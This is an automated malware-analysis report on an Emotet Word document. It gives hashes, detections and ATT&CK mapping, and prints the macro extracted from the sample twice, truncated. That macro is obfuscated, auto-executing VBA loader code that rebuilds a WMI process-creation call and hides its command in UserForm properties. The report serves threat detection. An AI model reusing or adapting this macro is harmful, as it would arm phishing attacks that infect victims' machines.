Emotet Office (OLE) malware analysis — malicious · 2dbecdec1580b1e1

MALICIOUS

Office (OLE)

169.5 KB Created: 2020-07-31 13:12:00 Authoring application: Microsoft Office Word First seen: 2020-09-04

MD5: 9579a7315929e9497c386e6d015c8ee1 SHA-1: 581306ae6d4e1204317b9ec0f38caf33f0d0ca2f SHA-256: 2dbecdec1580b1e170e843749f2dee018efd43137a30d5024a6c2ff301b99e7b

262 Risk Score

Malware Insights

Emotet · confidence 95%

MITRE ATT&CK

T1059.005 Visual Basic T1566.001 Spearphishing Attachment T1140 Deobfuscate/Decode Files or Information

The file contains a VBA macro that is automatically executed upon opening, as indicated by the Document_Open macro and CreateObject heuristics. The macro employs obfuscation techniques, including string manipulation and loops, to hide its true functionality. The ClamAV detection and heuristic firings strongly suggest this is an Emotet variant, likely acting as a downloader for further malicious payloads.

Heuristics 7

ClamAV: Doc.Malware.Emotet-9246065-1 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Malware.Emotet-9246065-1
VBA macros detected medium 4 related findings OLE_VBA_MACROS

Document contains VBA macro code
VBA UserForm hidden-property command stager critical OLE_VBA_USERFORM_HIDDEN_COMMAND_STAGER

VBA auto-exec macro creates a COM object from a decoded variable and reconstructs command text through Split/Join and hidden UserForm properties such as ControlTipText, Tag, Pages, or HelpContextId. This is a high-confidence macro downloader/loader shape seen in the reviewed OLE set, but it is not an Office CVE exploit primitive.
Document_Open macro high OLE_VBA_DOCOPEN

Document_Open macro
CreateObject call high OLE_VBA_CREATEOBJ

CreateObject call
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC

Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.

URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 5031 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	5031 bytes
SHA-256: `030a2bf7a84edfc041a3909cb1200ef5822b3ebab62942dd2c87da5fc0661bbe`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "ODULRbootyvcgate" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Private Sub _ Document_open() LGPRXitxkfjimglgx.LNPGYffzthritve End Sub Attribute VB_Name = "LGPRXitxkfjimglgx" Attribute VB_Base = "0{CFF3B71B-FBF6-4989-A117-46DB9E0971A5}{C9B24379-F237-44E7-8867-61E74ED61047}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = False Attribute VB_TemplateDerived = False Attribute VB_Customizable = False Function LNPGYffzthritve() Dim JUm3Y4Áv0ÕA As Integer JUm3Y4Áv0ÕA = 4 Do While JUm3Y4Áv0ÕA < 4 + 8 JUm3Y4Áv0ÕA = JUm3Y4Áv0ÕA + 8: DoEvents Loop Dim qJfMXTsq As String qJfMXTsq = Replace$("SV0ÄLNTNcMX", "SV0ÄLNT", "mU8àEA") Dim BwQyi As String BwQyi = Replace$("SHGy8ÅTZUh2àfw5Çjh", "SHGy8ÅTZU", "JMEbC") DDJXYcvxokeo = Chr(LGPRXitxkfjimglgx.Zoom + ((50 + 50 + 20) / 8)) Dim IKm1ÚK As Integer IKm1ÚK = 5 Do While IKm1ÚK < 5 + 7 IKm1ÚK = IKm1ÚK + 4: DoEvents Loop LIIORknglmsdcx = "0202093hui87(Yhshhshs303030dd0202093hui87(Yhshhshs303030ddw0202093hui87(Yhshhshs303030ddi0202093hui87(Yhshhshs303030ddnm0202093hui87(Yhshhshs303030dd0202093hui87(Yhshhshs303030ddgm0202093hui87(Yhshhshs303030ddt0202093hui87(Yhshhshs303030dd0202093hui87(Yhshhshs303030dd" + DDJXYcvxokeo + "0202093hui87(Yhshhshs303030dd0202093hui87(Yhshhshs303030dd:0202093hui87(Yhshhshs303030ddw0202093hui87(Yhshhshs303030ddin0202093hui87(Yhshhshs303030dd0202093hui87(Yhshhshs303030dd30202093hui87(Yhshhshs303030dd20202093hui87(Yhshhshs303030dd_0202093hui87(Yhshhshs303030dd" + LGPRXitxkfjimglgx.CUVHAigstubpk + "0202093hui87(Yhshhshs303030ddro0202093hui87(Yhshhshs303030dd0202093hui87(Yhshhshs303030ddce0202093hui87(Yhshhshs303030dds0202093hui87(Yhshhshs303030dds0202093hui87(Yhshhshs303030dd" Dim cbSSJYfyE As String cbSSJYfyE = Replace$("qCHAmOwKdYa", "qCHAmO", "ktbh") NSMTGjkpfpqowgslql = IETOTzembciidoytxg(LIIORknglmsdcx) Dim Ff5Ë8 As Integer Ff5Ë8 = 6 Do While Ff5Ë8 < 6 + 5 Ff5Ë8 = Ff5Ë8 + 8: DoEvents Loop Set SHTRUbmzrpdh = CreateObject(NSMTGjkpfpqowgslql) Dim NRK As String NRK = Replace$("QAondeVoi4ËhF6", "QAondeV", "sSP7") KDKNTyzrmvghi = LGPRXitxkfjimglgx.EIKJIjuignuhwo.ControlTipText Dim tTRG As String tTRG = Replace$("JnZlI4ÓQ", "JnZl", "VCMJiSHGyy") GMWSEdpaojnqzdgs = jdjjdjdjj + (NSMTGjkpfpqowgslql + DDJXYcvxokeo + LGPRXitxkfjimglgx.WWQKWhsyubaahihwlnm.ControlTipText + KDKNTyzrmvghi) Dim NWEbKjhI As Integer NWEbKjhI = 2 Do While NWEbKjhI < 2 + 2 NWEbKjhI = NWEbKjhI + 3: DoEvents Loop SADMNauqablwtwxw = GMWSEdpaojnqzdgs + LGPRXitxkfjimglgx.CUVHAigstubpk Dim XFdLa As String XFdLa = Replace$("XWMMET4ÖmQmUea0dZcG", "XWMMET4Öm", "T3SUj") Set TVZMJfvuztxrh = KTOEMveaytfutboak(SADMNauqablwtwxw) Dim ejcPcM As String ejcPcM = Replace$("YPcUjcHRCN", "YPcUjcH", "udQAon") j6j3nn3nb4 = Array("nxuih yhioasy ywww huwhd", SHTRUbmzrpdh. _ Create(GOENDnrysazk, DIUKEiuakckhkrw, TVZMJfvuztxrh), "diuhuq hioqcdsf") Dim IUoiXA As String IUoiXA = Replace$("FlKsSPqpFqDWRFi", "FlKsSPqp", "GmLtTRGEgu") End Function Function KTOEMveaytfutboak(YXKVPmhokdvhambpnc) Set KTOEMveaytfutboak = CreateObject(YXKVPmhokdvhambpnc) Dim nVtcC0ÈHL As String nVtcC0ÈHL = Replace$("XIUoiXAjhAf5ÑDWRFi3Äm", "XIUoiXAjhA", "NOb8ÄEg8l") KTOEMveaytfutboak.showwindow = UHDUKozzdmcnapvzk + IZXSDtzzitpucka + BAUVAojugsghzvgk Dim qOuFCbL As String qOuFCbL = Replace$("T4ÓotuCJkGBFv", "T4ÓotuC", "uKD") End Function Function IETOTzembciidoytxg(VTXIUqjeoatnyfhhxhv) ZEMRGymnxpcqbakkkx = VTXIUqjeoatnyfhhxhv Dim PFFvM As Integer PFFvM = 7 Do While PFFvM < 7 + 4 PFFvM = PFFvM + 6: DoEvents Loop AIYGPecxxlbersssdn = Split _ (ZEMRGymnxpcqbakkkx, "0202093hui87(*Yhshhshs303030dd") Dim JfMXTsqRQ As String JfMXTsqRQ = Replace$("GLN3ÈNcgOmUtr", "GLN3ÈNc", "AD6à") VRAYLbptriunmok = mm6m6m6m + Join(AIYGPecxxlbersssdn, o7o7oej5) Dim Vy2yPnW As S ... (truncated)

SHA-256: 030a2bf7a84edfc041a3909cb1200ef5822b3ebab62942dd2c87da5fc0661bbe

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "ODULRbootyvcgate"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub _
Document_open()
LGPRXitxkfjimglgx.LNPGYffzthritve
End Sub


Attribute VB_Name = "LGPRXitxkfjimglgx"
Attribute VB_Base = "0{CFF3B71B-FBF6-4989-A117-46DB9E0971A5}{C9B24379-F237-44E7-8867-61E74ED61047}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Function LNPGYffzthritve()
Dim JUm3Y4Áv0ÕA As Integer
JUm3Y4Áv0ÕA = 4
Do While JUm3Y4Áv0ÕA < 4 + 8
JUm3Y4Áv0ÕA = JUm3Y4Áv0ÕA + 8: DoEvents
Loop
Dim qJfMXTsq As String
qJfMXTsq = Replace$("SV0ÄLNTNcMX", "SV0ÄLNT", "mU8àEA")
Dim BwQyi As String
BwQyi = Replace$("SHGy8ÅTZUh2àfw5Çjh", "SHGy8ÅTZU", "JMEbC")
DDJXYcvxokeo = Chr(LGPRXitxkfjimglgx.Zoom + ((50 + 50 + 20) / 8))
Dim IKm1ÚK As Integer
IKm1ÚK = 5
Do While IKm1ÚK < 5 + 7
IKm1ÚK = IKm1ÚK + 4: DoEvents
Loop
LIIORknglmsdcx = "0202093hui87(*Yhshhshs303030dd0202093hui87(*Yhshhshs303030ddw0202093hui87(*Yhshhshs303030ddi0202093hui87(*Yhshhshs303030ddnm0202093hui87(*Yhshhshs303030dd0202093hui87(*Yhshhshs303030ddgm0202093hui87(*Yhshhshs303030ddt0202093hui87(*Yhshhshs303030dd0202093hui87(*Yhshhshs303030dd" + DDJXYcvxokeo + "0202093hui87(*Yhshhshs303030dd0202093hui87(*Yhshhshs303030dd:0202093hui87(*Yhshhshs303030ddw0202093hui87(*Yhshhshs303030ddin0202093hui87(*Yhshhshs303030dd0202093hui87(*Yhshhshs303030dd30202093hui87(*Yhshhshs303030dd20202093hui87(*Yhshhshs303030dd_0202093hui87(*Yhshhshs303030dd" + LGPRXitxkfjimglgx.CUVHAigstubpk + "0202093hui87(*Yhshhshs303030ddro0202093hui87(*Yhshhshs303030dd0202093hui87(*Yhshhshs303030ddce0202093hui87(*Yhshhshs303030dds0202093hui87(*Yhshhshs303030dds0202093hui87(*Yhshhshs303030dd"
Dim cbSSJYfyE As String
cbSSJYfyE = Replace$("qCHAmOwKdYa", "qCHAmO", "ktbh")
NSMTGjkpfpqowgslql = IETOTzembciidoytxg(LIIORknglmsdcx)
Dim Ff5Ë8 As Integer
Ff5Ë8 = 6
Do While Ff5Ë8 < 6 + 5
Ff5Ë8 = Ff5Ë8 + 8: DoEvents
Loop
Set SHTRUbmzrpdh = CreateObject(NSMTGjkpfpqowgslql)
Dim NRK As String
NRK = Replace$("QAondeVoi4ËhF6", "QAondeV", "sSP7")
KDKNTyzrmvghi = LGPRXitxkfjimglgx.EIKJIjuignuhwo.ControlTipText
Dim tTRG As String
tTRG = Replace$("JnZlI4ÓQ", "JnZl", "VCMJiSHGyy")
GMWSEdpaojnqzdgs = jdjjdjdjj + (NSMTGjkpfpqowgslql + DDJXYcvxokeo + LGPRXitxkfjimglgx.WWQKWhsyubaahihwlnm.ControlTipText + KDKNTyzrmvghi)
Dim NWEbKjhI As Integer
NWEbKjhI = 2
Do While NWEbKjhI < 2 + 2
NWEbKjhI = NWEbKjhI + 3: DoEvents
Loop
SADMNauqablwtwxw = GMWSEdpaojnqzdgs + LGPRXitxkfjimglgx.CUVHAigstubpk
Dim XFdLa As String
XFdLa = Replace$("XWMMET4ÖmQmUea0dZcG", "XWMMET4Öm", "T3SUj")
Set TVZMJfvuztxrh = KTOEMveaytfutboak(SADMNauqablwtwxw)
Dim ejcPcM As String
ejcPcM = Replace$("YPcUjcHRCN", "YPcUjcH", "udQAon")
j6j3nn3nb4 = Array("nxuih yhioasy ywww huwhd", SHTRUbmzrpdh. _
Create(GOENDnrysazk, DIUKEiuakckhkrw, TVZMJfvuztxrh), "diuhuq hioqcdsf")
Dim IUoiXA As String
IUoiXA = Replace$("FlKsSPqpFqDWRFi", "FlKsSPqp", "GmLtTRGEgu")
End Function
Function KTOEMveaytfutboak(YXKVPmhokdvhambpnc)
Set KTOEMveaytfutboak = CreateObject(YXKVPmhokdvhambpnc)
Dim nVtcC0ÈHL As String
nVtcC0ÈHL = Replace$("XIUoiXAjhAf5ÑDWRFi3Äm", "XIUoiXAjhA", "NOb8ÄEg8l")
KTOEMveaytfutboak.showwindow = UHDUKozzdmcnapvzk + IZXSDtzzitpucka + BAUVAojugsghzvgk
Dim qOuFCbL As String
qOuFCbL = Replace$("T4ÓotuCJkGBFv", "T4ÓotuC", "uKD")
End Function
Function IETOTzembciidoytxg(VTXIUqjeoatnyfhhxhv)
ZEMRGymnxpcqbakkkx = VTXIUqjeoatnyfhhxhv
Dim PFFvM As Integer
PFFvM = 7
Do While PFFvM < 7 + 4
PFFvM = PFFvM + 6: DoEvents
Loop
AIYGPecxxlbersssdn = Split _
(ZEMRGymnxpcqbakkkx, "0202093hui87(*Yhshhshs303030dd")
Dim JfMXTsqRQ As String
JfMXTsqRQ = Replace$("GLN3ÈNcgOmUtr", "GLN3ÈNc", "AD6à")
VRAYLbptriunmok = mm6m6m6m + Join(AIYGPecxxlbersssdn, o7o7oej5)
Dim Vy2yPnW As S
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.